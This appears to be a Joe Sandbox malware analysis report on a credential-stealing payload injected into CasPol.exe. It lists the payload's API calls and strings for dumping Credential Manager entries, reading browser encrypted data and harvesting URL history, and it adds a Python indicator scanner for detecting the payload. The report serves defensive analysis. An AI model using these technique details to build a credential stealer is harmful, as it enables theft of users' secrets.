• 0x4147f3 -> 0x414561: 0x41457f GetPrivateProfileIntW; 0x4143f1 memset, _itow, WritePrivateProfileStringW
APIs
• Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
• Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
• Part of subcall function 00418680: free.MSVCRT ref: 004186C7
• Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
• GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
• free.MSVCRT ref: 00418803
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
• String ID:
• API String ID: 1355100292-0
• Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
• Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
• Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
• Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                                                  • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoSystemmemset
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3558857096-0
                                                                                                                                                                                                                                  • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                                  • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
• Function entry: 0044553B; basic blocks span 0044553B-00445FB2
• Subroutines called from this function: 0044DB70, 0040C768, 0040BDB0, 004135F7, 00403988, 00444B06, 004136C0, 0041366B, 0040A889, 00403E2D, 00403C9C, 00403FBE, 00414C2E, 0040B2CC, 00409D1F, 00409B98, 0040B1AB, 0040B6EF, 0040AE18, 004087B3, 004454BF, 0040A9B5, 00445389, 004099C6, 00445403, 00409C52, 00445093, 00413CFA, 00413D4C, 00413FA6, 0040AEBE, 0040ADD4, 00409C70, 00413D29, 0040AE51
APIs
• memset.MSVCRT ref: 004455C2
• wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 0044570D
• memset.MSVCRT ref: 00445725
  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
  • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9 (NULL filter, flags 0: returns every credential stored in the current user's Credential Manager)
  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
  • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
  • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
• memset.MSVCRT ref: 0044573D
• memset.MSVCRT ref: 00445755
• memset.MSVCRT ref: 004458CB
• memset.MSVCRT ref: 004458E3
• memset.MSVCRT ref: 0044596E
• memset.MSVCRT ref: 00445A10
• memset.MSVCRT ref: 00445A28
• memset.MSVCRT ref: 00445AC6
  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE (operator new)
  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0 (operator delete)
  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
• memset.MSVCRT ref: 00445B52
• memset.MSVCRT ref: 00445B6A
• memset.MSVCRT ref: 00445C9B
• memset.MSVCRT ref: 00445CB3
• _wcsicmp.MSVCRT ref: 00445D56
• memset.MSVCRT ref: 00445B82
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C (GENERIC_READ, no sharing, OPEN_EXISTING)
  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
• memset.MSVCRT ref: 00445986
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C (existence check on the built path)
Strings
• *.*
• Apple Computer\Preferences\keychain.plist
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
• String ID: *.*$Apple Computer\Preferences\keychain.plist
• API String ID: 2263259095-3798722523
• Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
• Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
• Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
• Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
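The routine above combines a CredEnumerateW call (Windows Credential Manager dump), a "*.*" directory-enumeration mask and the wide string "Apple Computer\Preferences\keychain.plist" in one function, which is a usable hunting signature for this credential-stealing code in unpacked memory dumps or other samples. The following offline checker is an added example written for this report, not code from Joe Sandbox or from the analysed sample; the sample buffers in it are constructed for the demonstration and the function names (`find_indicators`, `looks_like_cred_harvester`, `scan_file`) are the example's own.

```python
"""
Added example: flag a PE image or memory dump that carries the artefact set the
report lists for the function at 0044553B. Strings in a 32-bit Windows binary
built with wchar_t are stored as UTF-16LE, so the wide indicators are searched
in that encoding; the import name is plain ASCII in the import name table.
"""

# Indicators taken from the report's Strings / APIs lists for this function.
KEYCHAIN_PATH = "Apple Computer\\Preferences\\keychain.plist"
ENUM_MASK = "*.*"
CRED_API = b"CredEnumerateW"


def wide(s: str) -> bytes:
    """Encode as a wchar_t string would appear in memory (UTF-16LE, no BOM)."""
    return s.encode("utf-16-le")


def find_indicators(image: bytes) -> dict:
    """Return a dict of indicator name -> first byte offset for every indicator present."""
    hits = {}
    for name, needle in (
        ("keychain_plist", wide(KEYCHAIN_PATH)),
        ("enum_mask", wide(ENUM_MASK)),
        ("cred_enumerate_w", CRED_API),
    ):
        offset = image.find(needle)
        if offset != -1:
            hits[name] = offset
    return hits


def looks_like_cred_harvester(image: bytes) -> bool:
    """
    Require both the credential API and the keychain path, as the report shows
    them in the same routine. A lone "*.*" mask is far too common to use, and
    CredEnumerateW alone also appears in legitimate credential-aware software.
    """
    hits = find_indicators(image)
    return "keychain_plist" in hits and "cred_enumerate_w" in hits


def scan_file(path: str) -> dict:
    """Convenience wrapper for a dumped image on disk (hypothetical helper name)."""
    with open(path, "rb") as fh:
        return find_indicators(fh.read())


# Constructed sample buffers (not bytes from the report): a minimal layout with
# the import name, the mask and the path, and a benign-looking one with only the API.
SAMPLE_HIT = (
    b"MZ" + b"\x00" * 16
    + CRED_API + b"\x00"
    + wide(ENUM_MASK) + b"\x00\x00"
    + wide(KEYCHAIN_PATH) + b"\x00\x00"
)
SAMPLE_BENIGN = b"MZ" + b"\x00" * 16 + CRED_API + b"\x00" + b"credui helper"

if __name__ == "__main__":
    print(find_indicators(SAMPLE_HIT))
    print(looks_like_cred_harvester(SAMPLE_HIT), looks_like_cred_harvester(SAMPLE_BENIGN))
```

Run it against the unpacked 00400000 region of the injected CasPol.exe process rather than the original .hta, since the strings only exist in the decoded payload; on a packed file on disk the wide strings will not be found and the check correctly reports nothing.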

Control-flow Graph (rendered graph not reproduced)

APIs
  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514 (MB_OK | MB_ICONWARNING)
• SetErrorMode.KERNELBASE(00008001), ref: 00412799 (SEM_FAILCRITICALERRORS | SEM_NOOPENFILEERRORBOX: suppresses critical-error and open-file error dialogs so the process does not block on a message box)
• GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
• EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
Strings
• /deleteregkey
• /savelangfile
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
• String ID: $/deleteregkey$/savelangfile
• API String ID: 2744995895-28296030
• Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
• Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
• Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
• Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                    • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                                                                    • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                                                                  • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                                                                  • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                                                                                                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                                                                                                                                                  • String ID: chp$v10
                                                                                                                                                                                                                                  • API String ID: 4165125987-2783969131
                                                                                                                                                                                                                                  • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                                                                                                                                  • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3715365532-3916222277
                                                                                                                                                                                                                                  • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                                                                                                                                  • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                                    • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                                    • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                                    • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                                    • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                                    • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                                  • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
• String ID: bhv
• API String ID: 4234240956-2689659898
• Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
• Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
• Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
• Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

Control-flow Graph (rendered graph not reproduced; function entry block at 4466f4)
APIs
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
• String ID:
• API String ID: 2827331108-0
• Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
• Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
• Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
• Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

Control-flow Graph

APIs
• memset.MSVCRT ref: 0040C298
  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
• FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
• wcschr.MSVCRT ref: 0040C324
• wcschr.MSVCRT ref: 0040C344
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
• GetLastError.KERNEL32 ref: 0040C373
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
• FindCloseUrlCache.WININET(?), ref: 0040C3B0
Strings
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
• String ID: visited:
• API String ID: 1157525455-1702587658
• Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
• Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
• Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
• Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

Control-flow Graph (rendered graph not reproduced; function entry block at 40e175)
APIs
  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
• memset.MSVCRT ref: 0040E1BD
  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
• free.MSVCRT ref: 0040E28B
  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
• _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
Strings
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
• String ID: $ContainerId$Container_%I64d$Containers$Name
• API String ID: 2804212203-2982631422
• Opcode ID: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
• Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
• Opcode Fuzzy Hash: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
• Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

Control-flow Graph

APIs
  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
• memset.MSVCRT ref: 0040BC75
• memset.MSVCRT ref: 0040BC8C
• WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
• memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
• memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
• LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
Strings
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
• String ID:
• API String ID: 115830560-3916222277
• Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
• Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
• Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
• Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

Control-flow Graph (rendered graph not reproduced; function entry block at 41837f)
APIs
• CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
• CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
• GetLastError.KERNEL32 ref: 0041847E
• free.MSVCRT ref: 0041848B
Strings
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: CreateFile$ErrorLastfree
                                                                                                                                                                                                                                  • String ID: |A
                                                                                                                                                                                                                                  • API String ID: 77810686-1717621600
                                                                                                                                                                                                                                  • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                                                                                                  • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                                                                                                                                                                                  Control-flow Graph

